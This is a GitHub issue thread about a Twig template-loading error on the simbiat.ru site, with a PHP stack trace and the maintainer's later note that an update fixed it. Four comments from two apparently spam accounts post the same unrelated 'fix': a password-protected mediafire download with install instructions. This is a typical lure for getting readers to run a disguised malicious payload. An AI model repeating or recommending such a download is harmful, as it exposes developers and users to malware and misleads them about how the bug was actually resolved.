### ISSUE TITLE
Unable to find template "errors/{http.error.status_code}.twig"

### ISSUE THREAD

**Issue by Simbiat** [Simbiat/simbiat.ru#271]
probably when DB is down
```
[2024-08-31T06:40:08+00:00] Twig\Error\LoaderError Exception:
	Page: fftracker/characters/11894356/
	File: /app/templates/index.twig
	Line: 39
	Unable to find template "errors/{http.error.status_code}.twig" (looked into: /app/templates).
	#0 /app/vendor/twig/twig/src/Loader/FilesystemLoader.php(131): Twig\Loader\FilesystemLoader->findTemplate()
#1 /app/vendor/twig/twig/src/Environment.php(291): Twig\Loader\FilesystemLoader->getCacheKey()
#2 /app/vendor/twig/twig/src/Environment.php(344): Twig\Environment->getTemplateClass()
#3 /app/vendor/twig/twig/src/Environment.php(467): Twig\Environment->load()
#4 /app/vendor/twig/twig/src/Extension/CoreExtension.php(1325): Twig\Environment->resolveTemplate()
#5 /app/data/cache/twig/25/25cfc188b603e28f795f73b6eb838ec2.php(142): Twig\Extension\CoreExtension::include()
#6 /app/vendor/twig/twig/src/Template.php(352): __TwigTemplate_d06a6d719b88a1dcee80b3c18a05e5ab->doDisplay()
#7 /app/vendor/twig/twig/src/Template.php(335): Twig\Template->yield()
#8 /app/vendor/twig/twig/src/TemplateWrapper.php(38): Twig\Template->render()
#9 /app/vendor/twig/twig/src/Environment.php(307): Twig\TemplateWrapper->render()
#10 /app/lib/Website/HomePage.php(312): Twig\Environment->render()
#11 /app/lib/Website/HomePage.php(173): Simbiat\Website\HomePage->twigProc()
#12 /app/lib/Website/HomePage.php(59): Simbiat\Website\HomePage->init()
#13 /app/public/index.php(20): Simbiat\Website\HomePage->__construct()
#14 {main}
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Simbiat** [comment]
Caused by https://github.com/Simbiat/simbiat.ru/commit/ee70d73856973b674327a48e5e813a2aab96e796

**Comment by Simbiat** [comment]
Issus is solved after update to 1.3.2
